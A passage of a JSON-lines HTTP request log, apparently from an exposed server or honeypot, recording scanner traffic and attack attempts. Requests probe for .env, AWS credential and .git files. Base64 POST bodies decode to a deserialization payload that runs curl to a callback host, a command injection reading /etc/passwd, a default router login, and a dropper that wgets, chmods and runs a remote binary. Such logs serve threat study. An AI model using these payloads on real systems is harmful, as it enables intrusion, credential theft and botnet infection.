"xvideos.com", "Method": "GET", "Path": "/?q=ultrasurf", "Http_Version": "HTTP/1.1"} +{"ip": "185.36.81.33", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Accept_Language": "en US,en;q=0.9,sv;q=0.8", "Connection": "keep-alive", "Content_Type": "application/x-www-form-urlencoded; charset=UTF-8", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46", "X_Requested_With": "XMLHttpRequest", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "165.232.177.124", "Host": "google.com:443", "User_Agent": "Go-http-client/1.1", "Method": "CONNECT", "Path": "google.com:443", "Http_Version": "HTTP/1.1"} +{"ip": "3.84.188.63", "Accept_Charset": "utf-8", "Accept_Encoding": "gzip", "Connection": "close", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "Method": "GET", "Path": "/s3cmd.ini", "Http_Version": "HTTP/1.1"} +{"ip": "3.84.188.63", "Accept_Charset": "utf-8", "Accept_Encoding": "gzip", "Connection": "close", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.76 Safari/537.36 OPR/19.0.1326.56", "Method": "GET", "Path": "/.env", "Http_Version": "HTTP/1.1"} +{"ip": "185.224.128.184", "Host": "xvideos.com", "Method": "GET", "Path": "/?q=ultrasurf", "Http_Version": "HTTP/1.1"} +{"ip": "45.128.232.140", "Host": "google.com:443", "User_Agent": "Go-http-client/1.1", "Method": "CONNECT", "Path": "google.com:443", "Http_Version": "HTTP/1.1"} +{"ip": "185.224.128.184", "Host": "xvideos.com", "Method": "GET", "Path": "/?q=ultrasurf", "Http_Version": "HTTP/1.1"} +{"ip": "107.170.227.4", "Accept": "*/*", "Accept_Encoding": "gzip", "Host": "116.202.22.148:8080", "User_Agent": "Mozilla/5.0 zgrab/0.x", "Method": "GET", "Path": "/actuator/health", "Http_Version": "HTTP/1.1"} +{"ip": "209.141.33.40", "Accept_Encoding": "gzip", "Connection": "close", "Content_Length": "504", "Content_Type": "application/xml", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "Method": "POST", "Path": "/", "Http_Version": "HTTP/1.1", "POST_Payload": "PHNvcnRlZC1zZXQ+DQogICAgPHN0cmluZz5mb288L3N0cmluZz4NCiAgICA8Y29udGFjdCBjbGFzcz0nZHluYW1pYy1wcm94eSc+DQogICAgICA8aW50ZXJmYWNlPmphdmEubGFuZy5Db21wYXJhYmxlPC9pbnRlcmZhY2U+DQogICAgICA8aGFuZGxlciBjbGFzcz0namF2YS5iZWFucy5FdmVudEhhbmRsZXInPg0KICAgICAgICAgIDx0YXJnZXQgY2xhc3M9J2phdmEubGFuZy5Qcm9jZXNzQnVpbGRlcic+DQogICAgICAgICAgICAgIDxjb21tYW5kPg0KICAgICAgICAgICAgICAgIDxzdHJpbmc+Y3VybDwvc3RyaW5nPg0KICAgICAgICAgICAgICAgIDxzdHJpbmc+aHR0cDovL2NrcDlya3ZzYTkwbG9yZHFldXFnZmtxcHlnaWhqemY5aS5vYXN0LmZ1bjwvc3RyaW5nPg0KICAgICAgICAgICAgICA8L2NvbW1hbmQ+DQogICAgICAgICAgPC90YXJnZXQ+DQogICAgICAgICAgPGFjdGlvbj5zdGFydDwvYWN0aW9uPg0KICAgICAgPC9oYW5kbGVyPg0KICA8L2NvbnRhY3Q+DQo8L3NvcnRlZC1zZXQ+"} +{"ip": "209.141.33.40", "Accept_Encoding": "gzip", "Connection": "close", "Content_Length": "25", "Content_Type": "application/x-www-form-urlencoded", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "Method": "POST", "Path": "/webadm/?q=moni_detail.do&action=gragh", "Http_Version": "HTTP/1.1", "POST_Payload": "dHlwZT0nfGNhdCAvZXRjL3Bhc3N3ZHx8Jw=="} +{"ip": "3.84.188.63", "Accept_Charset": "utf-8", "Accept_Encoding": "gzip", "Connection": "close", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Mobile Safari/537.36", "Method": "GET", "Path": "/.svn/entries", "Http_Version": "HTTP/1.1"} +{"ip": "3.84.188.63", "Accept_Charset": "utf-8", "Accept_Encoding": "gzip", "Connection": "close", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36", "Method": "GET", "Path": "/.aws/credentials", "Http_Version": "HTTP/1.1"} +{"ip": "45.128.232.140", "Host": "google.com:443", "User_Agent": "Go-http-client/1.1", "Method": "CONNECT", "Path": "google.com:443", "Http_Version": "HTTP/1.1"} +{"ip": "193.35.18.33", "Host": "google.com:443", "User_Agent": "Go-http-client/1.1", "Method": "CONNECT", "Path": "google.com:443", "Http_Version": "HTTP/1.1"} +{"ip": "92.74.150.174", "Accept": "text/plain,text/html", "Host": "116.202.22.148", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.0"} +{"ip": "193.35.18.33", "Host": "google.com:443", "User_Agent": "Go-http-client/1.1", "Method": "CONNECT", "Path": "google.com:443", "Http_Version": "HTTP/1.1"} +{"ip": "45.128.232.140", "Host": "google.com:443", "User_Agent": "Go-http-client/1.1", "Method": "CONNECT", "Path": "google.com:443", "Http_Version": "HTTP/1.1"} +{"ip": "165.232.73.237", "Accept": "*/*", "Accept_Encoding": "gzip", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 zgrab/0.x", "Method": "GET", "Path": "/aaa9", "Http_Version": "HTTP/1.1"} +{"ip": "165.232.73.237", "Accept": "*/*", "Accept_Encoding": "gzip", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 zgrab/0.x", "Method": "GET", "Path": "/aab8", "Http_Version": "HTTP/1.1"} +{"ip": "165.232.73.237", "Accept": "*/*", "Accept_Encoding": "gzip", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 zgrab/0.x", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "43.130.57.239", "Accept": "*/*", "Host": "116.202.22.148:8080", "User_Agent": "curl/7.64.1", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "36.99.136.136", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Accept_Encoding": "gzip", "Accept_Language": "en;q=0.9", "Cache_Control": "max-age=0", "Connection": "keep-alive", "DNT": "1", "Host": "116.202.22.148:8080", "Upgrade_Insecure_Requests": "1", "User_Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36", "Sec-Gpc": "1", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "36.99.136.128", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Accept_Encoding": "gzip", "Accept_Language": "en;q=0.9", "Cache_Control": "max-age=0", "Connection": "keep-alive", "DNT": "1", "Host": "swarm-dev.tmnow.net:8080", "Upgrade_Insecure_Requests": "1", "User_Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36", "Sec-Gpc": "1", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "36.99.136.136", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Accept_Encoding": "gzip", "Accept_Language": "en;q=0.9", "Cache_Control": "max-age=0", "Connection": "keep-alive", "DNT": "1", "Host": "116.202.22.148:8080", "Upgrade_Insecure_Requests": "1", "User_Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36", "Sec-Gpc": "1", "Method": "GET", "Path": "/favicon.ico", "Http_Version": "HTTP/1.1"} +{"ip": "36.99.136.128", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Accept_Encoding": "gzip", "Accept_Language": "en;q=0.9", "Cache_Control": "max-age=0", "Connection": "keep-alive", "DNT": "1", "Host": "swarm-dev.tmnow.net:8080", "Upgrade_Insecure_Requests": "1", "User_Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36", "Sec-Gpc": "1", "Method": "GET", "Path": "/favicon.ico", "Http_Version": "HTTP/1.1"} +{"ip": "104.199.31.214", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Connection": "keep-alive", "Host": "116.202.22.148", "User_Agent": "python-requests/2.31.0", "x-datadog-trace-id": "4022988009961804125", "x-datadog-parent-id": "9685836189968230277", "x-datadog-sampling-priority": "0", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "78.108.177.52", "Accept": "*/*", "User_Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; Trident/5.0)", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.0"} +{"ip": "46.174.191.32", "Accept": "*/*", "User_Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.100 Safari/534.30", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.0"} +{"ip": "185.216.71.70", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Connection": "keep-alive", "Host": "116.202.22.148", "User_Agent": "python-requests/2.28.2", "Method": "GET", "Path": "/.git/config", "Http_Version": "HTTP/1.1"} +{"ip": "185.216.71.70", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Connection": "keep-alive", "Host": "116.202.22.148", "User_Agent": "python-requests/2.28.2", "Method": "GET", "Path": "/.git/config", "Http_Version": "HTTP/1.1"} +{"ip": "185.216.71.70", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Connection": "keep-alive", "Host": "116.202.22.148", "User_Agent": "python-requests/2.28.2", "Method": "GET", "Path": "/.git/config", "Http_Version": "HTTP/1.1"} +{"ip": "185.216.71.70", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Connection": "keep-alive", "Host": "116.202.22.148", "User_Agent": "python-requests/2.28.2", "Method": "GET", "Path": "/.git/config", "Http_Version": "HTTP/1.1"} +{"ip": "205.210.31.152", "Accept": "*/*", "User_Agent": "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.0"} +{"ip": "167.248.133.185", "Host": "116.202.22.148:80", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "167.248.133.185", "Accept": "*/*", "Accept_Encoding": "gzip", "Host": "apps.bekagvazava.com", "User_Agent": "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "167.248.133.185", "Accept_Encoding": "gzip", "Connection": "close", "Host": "apps.bekagvazava.com", "User_Agent": "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)", "Method": "GET", "Path": "/favicon.ico", "Http_Version": "HTTP/1.1"} +{"ip": "185.224.128.184", "Host": "xvideos.com", "Method": "GET", "Path": "/?q=ultrasurf", "Http_Version": "HTTP/1.1"} +{"ip": "45.128.232.125", "Host": "google.com:443", "User_Agent": "Go-http-client/1.1", "Method": "CONNECT", "Path": "google.com:443", "Http_Version": "HTTP/1.1"} +{"ip": "162.142.125.213", "Host": "116.202.22.148:80", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "162.142.125.213", "Accept": "*/*", "Accept_Encoding": "gzip", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "162.142.125.213", "Accept_Encoding": "gzip", "Connection": "close", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)", "Method": "GET", "Path": "/favicon.ico", "Http_Version": "HTTP/1.1"} +{"ip": "138.199.60.32", "Accept": "*/*", "Accept_Encoding": "gzip", "Host": "116.202.22.148:8080", "User_Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "71.6.232.20", "Accept": "*/*", "Accept_Encoding": "gzip", "Host": "116.202.22.148:8080", "User_Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "45.128.232.140", "Host": "google.com:443", "User_Agent": "Go-http-client/1.1", "Method": "CONNECT", "Path": "google.com:443", "Http_Version": "HTTP/1.1"} +{"ip": "162.243.138.49", "Accept": "*/*", "Accept_Encoding": "gzip", "Host": "116.202.22.148:8080", "User_Agent": "Mozilla/5.0 zgrab/0.x", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "200.89.105.142", "Content_Length": "0", "Host": "116.202.22.148:80", "User_Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "46.174.191.30", "Accept": "*/*", "User_Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.100 Safari/534.30", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.0"} +{"ip": "185.254.37.107", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept_Encoding": "gzip, deflate", "Accept_Language": "en-GB,en;q=0.5", "Connection": "keep-alive", "Content_Length": "29", "Content_Type": "application/x-www-form-urlencoded", "Host": "116.202.22.148:80", "Origin": "http://116.202.22.148:80", "Referer": "http://116.202.22.148:80/admin/login.asp", "Upgrade_Insecure_Requests": "1", "User_Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0", "Method": "POST", "Path": "/boaform/admin/formLogin", "Http_Version": "HTTP/1.1", "POST_Payload": "dXNlcm5hbWU9YWRtaW4mcHNkPUZlZWZpZm9mdW0NCg0K"} +{"ip": "185.224.128.184", "Host": "xvideos.com", "Method": "GET", "Path": "/?q=ultrasurf", "Http_Version": "HTTP/1.1"} +{"ip": "198.235.24.47", "Host": "116.202.22.148:8080", "User_Agent": "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "162.219.193.211", "Content_Length": "0", "Host": "116.202.22.148:80", "User_Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "185.224.128.184", "Host": "xvideos.com", "Method": "GET", "Path": "/?q=ultrasurf", "Http_Version": "HTTP/1.1"} +{"ip": "177.234.199.21", "Content_Length": "0", "Host": "116.202.22.148:80", "User_Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "92.119.176.47", "Cookie": "user=admin", "Method": "POST", "Path": "/goform/set_LimitClient_cfg", "Http_Version": "HTTP/1.1", "POST_Payload": "dGltZTE9MDA6MDAtMDA6MDAmdGltZTI9MDA6MDAtMDA6MDAmbWFjPTtybSAtcmYgKmFybSo7IHJtIC1yZiAqYXJtNSo7IHJtIC1yZiAqYXJtNio7IHJtIC1yZiAqYXJtNyo7IHJtIC1yZiAqbTY4ayo7IHJtIC1yZiAqbWlwcyo7IHJtIC1yZiAqbXBzbCo7IHJtIC1yZiAqcHBjKjsgcm0gLXJmICpzaDQqOyBybSAtcmYgKnNwYyo7IHJtIC1yZiAqeDg2Kjsgcm0gLXJmICp4ODZfNjQqO3dnZXQgaHR0cDovLzEwMy42Ny4xOTcuODcvc2t5bGpuZS5tcHNsOyBjaG1vZCA3Nzcgc2t5bGpuZS5tcHNsOyAuL3NreWxqbmUubXBzbCBsYmxpbmsuc2VsZnJlcDsNCg0K"} +{"ip": "79.110.62.146", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept_Encoding": "gzip, deflate", "Accept_Language": "en-GB,en;q=0.5", "Connection": "close", "Host": "116.202.22.148:80", "Upgrade_Insecure_Requests": "1", "User_Agent": "Linux Gnu (cow)", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "118.126.124.10", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Host": "116.202.22.148", "User_Agent": "Python/3.6 aiohttp/3.8.3", "X-Test-Token": "f1b600cef73c4757dc04c2f9349609b5", "Method": "HEAD", "Path": "/.env", "Http_Version": "HTTP/1.1"} +{"ip": "199.45.155.32", "Host": "116.202.22.148:80", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "78.108.177.50", "Accept": "*/*", "User_Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; Trident/5.0)", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.0"} +{"ip": "45.128.232.125", "Host": "google.com:443", "User_Agent": "Go-http-client/1.1", "Method": "CONNECT", "Path": "google.com:443", "Http_Version": "HTTP/1.1"} +{"ip": "193.35.18.33", "Host": "google.com:443", "User_Agent": "Go-http-client/1.1", "Method": "CONNECT", "Path": "google.com:443", "Http_Version": "HTTP/1.1"} +{"ip": "185.180.143.190", "Accept": "*/*", "Accept_Encoding": "gzip", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "79.110.62.146", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept_Encoding": "gzip, deflate", "Accept_Language": "en-GB,en;q=0.5", "Connection": "close", "Host": "116.202.22.148:80", "Upgrade_Insecure_Requests": "1", "User_Agent": "Linux Gnu (cow)", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "162.243.139.14", "Accept": "*/*", "Accept_Encoding": "gzip", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 zgrab/0.x", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "45.128.232.125", "Host": "google.com:443", "User_Agent": "Go-http-client/1.1", "Method": "CONNECT", "Path": "google.com:443", "Http_Version": "HTTP/1.1"} +{"ip": "185.224.128.184", "Host": "xvideos.com", "Method": "GET", "Path": "/?q=ultrasurf", "Http_Version": "HTTP/1.1"} +{"ip": "162.216.150.254", "Host": "116.202.22.148:80", "User_Agent": "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "193.35.18.33", "Host": "google.com:443", "User_Agent": "Go-http-client/1.1", "Method": "CONNECT", "Path": "google.com:443", "Http_Version": "HTTP/1.1"} +{"ip": "185.224.128.199", "Accept": "*/*", "Accept_Encoding": "gzip", "Host": "116.202.22.148:8080", "User_Agent": "Mozilla/5.0 zgrab/0.x", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "167.94.145.52", "Host": "116.202.22.148:80", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "167.94.145.52", "Accept": "*/*", "Accept_Encoding": "gzip", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "167.94.145.52", "Accept_Encoding": "gzip", "Connection": "close", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)", "Method": "GET", "Path": "/favicon.ico", "Http_Version": "HTTP/1.1"} +{"ip": "185.224.128.184", "Host": "xvideos.com", "Method": "GET", "Path": "/?q=ultrasurf", "Http_Version": "HTTP/1.1"} +{"ip": "139.59.182.23", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Accept_Encoding": "gzip, deflate", "Accept_Language": "en-US,en;q=0.9", "Cache_Control": "no-cache", "Host": "apps.bekagvazava.com", "Pragma": "no-cache", "User_Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "18.119.179.222", "Accept_Charset": "utf-8", "Accept_Encoding": "gzip", "Connection": "close", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Linux; Android 8.0.0; Pixel 2 XL Build/OPD1.170816.004) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Mobile Safari/537.36", "Method": "GET", "Path": "/.env", "Http_Version": "HTTP/1.1"} +{"ip": "37.120.232.44", "Accept": "*/*", "Host": "116.202.22.148", "Method": "GET", "Path": "/restore.php", "Http_Version": "HTTP/1.1"} +{"ip": "109.237.97.180", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Connection": "keep-alive", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36", "Method": "GET", "Path": "/.env", "Http_Version": "HTTP/1.1"} +{"ip": "20.55.99.207", "Method": "CONNECT", "Path": "google.com:443", "Http_Version": "HTTP/1.1"} +{"ip": "3.84.188.63", "Accept_Charset": "utf-8", "Accept_Encoding": "gzip", "Connection": "close", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:19.0) Gecko/20100101 Firefox/19.0 Iceweasel/19.0.2", "Method": "GET", "Path": "/.git/config", "Http_Version": "HTTP/1.1"} +{"ip": "185.224.128.184", "Host": "xvideos.com", "Method": "GET", "Path": "/?q=ultrasurf", "Http_Version": "HTTP/1.1"} +{"ip": "84.54.51.192", "Host": "google.com:443", "User_Agent": "Go-http-client/1.1", "Method": "CONNECT", "Path": "google.com:443", "Http_Version": "HTTP/1.1"} +{"ip": "46.174.191.32", "Accept": "*/*", "User_Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.100 Safari/534.30", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.0"} +{"ip": "185.224.128.184", "Host": "xvideos.com", "Method": "GET", "Path": "/?q=ultrasurf", "Http_Version": "HTTP/1.1"} +{"ip": "71.6.165.200", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept_Encoding": "identity", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "71.6.165.200", "Accept_Encoding": "identity", "Host": "116.202.22.148", "Method": "GET", "Path": "/robots.txt", "Http_Version": "HTTP/1.1"} +{"ip": "71.6.165.200", "Accept_Encoding": "identity", "Host": "116.202.22.148", "Method": "GET", "Path": "/sitemap.xml", "Http_Version": "HTTP/1.1"} +{"ip": "71.6.165.200", "Accept_Encoding": "identity", "Host": "116.202.22.148", "Method": "GET", "Path": "/.well-known/security.txt", "Http_Version": "HTTP/1.1"} +{"ip": "71.6.165.200", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Connection": "keep-alive", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36", "Method": "GET", "Path": "/favicon.ico", "Http_Version": "HTTP/1.1"} +{"ip": "45.128.232.183", "Host": "google.com:443", "User_Agent": "Go-http-client/1.1", "Method": "CONNECT", "Path": "google.com:443", "Http_Version": "HTTP/1.1"} +{"ip": "146.255.81.98", "Content_Length": "0", "Host": "116.202.22.148:80", "User_Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "141.98.11.60", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Accept_Language": "en US,en;q=0.9,sv;q=0.8", "Connection": "keep-alive", "Content_Type": "application/x-www-form-urlencoded; charset=UTF-8", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46", "X_Requested_With": "XMLHttpRequest", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "45.128.232.140", "Host": "google.com:443", "User_Agent": "Go-http-client/1.1", "Method": "CONNECT", "Path": "google.com:443", "Http_Version": "HTTP/1.1"} +{"ip": "192.241.226.53", "Accept": "*/*", "Accept_Encoding": "gzip", "Host": "116.202.22.148:8080", "User_Agent": "Mozilla/5.0 zgrab/0.x", "Method": "GET", "Path": "/actuator/health", "Http_Version": "HTTP/1.1"} +{"ip": "185.224.128.184", "Host": "xvideos.com", "Method": "GET", "Path": "/?q=ultrasurf", "Http_Version": "HTTP/1.1"} +{"ip": "179.43.128.106", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept_Encoding": "gzip, deflate", "Accept_Language": "en-GB,en;q=0.5", "Connection": "keep-alive", "Content_Length": "29", "Content_Type": "application/x-www-form-urlencoded", "Host": "116.202.22.148:80", "Origin": "http://116.202.22.148:80", "Referer": "http://116.202.22.148:80/admin/login.asp", "Upgrade_Insecure_Requests": "1", "User_Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0", "Method": "POST", "Path": "/boaform/admin/formLogin", "Http_Version": "HTTP/1.1", "POST_Payload": "dXNlcm5hbWU9YWRtaW4mcHNkPUZlZWZpZm9mdW0NCg0K"} +{"ip": "198.235.24.135", "Host": "static.148.22.202.116.clients.your-server.de", "User_Agent": "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "84.54.51.192", "Host": "google.com:443", "User_Agent": "Go-http-client/1.1", "Method": "CONNECT", "Path": "google.com:443", "Http_Version": "HTTP/1.1"} +{"ip": "183.136.225.29", "Accept": "*/*", "Connection": "keep-alive", "Host": "116.202.22.148:80", "User_Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "183.136.225.29", "Accept": "*/*", "Accept_Encoding": "gzip", "Connection": "close", "Host": "116.202.22.148:80", "User_Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "183.136.225.29", "Accept": "*/*", "Accept_Encoding": "gzip", "Connection": "close", "Host": "116.202.22.148:80", "User_Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE", "Method": "GET", "Path": "/favicon.ico", "Http_Version": "HTTP/1.1"} +{"ip": 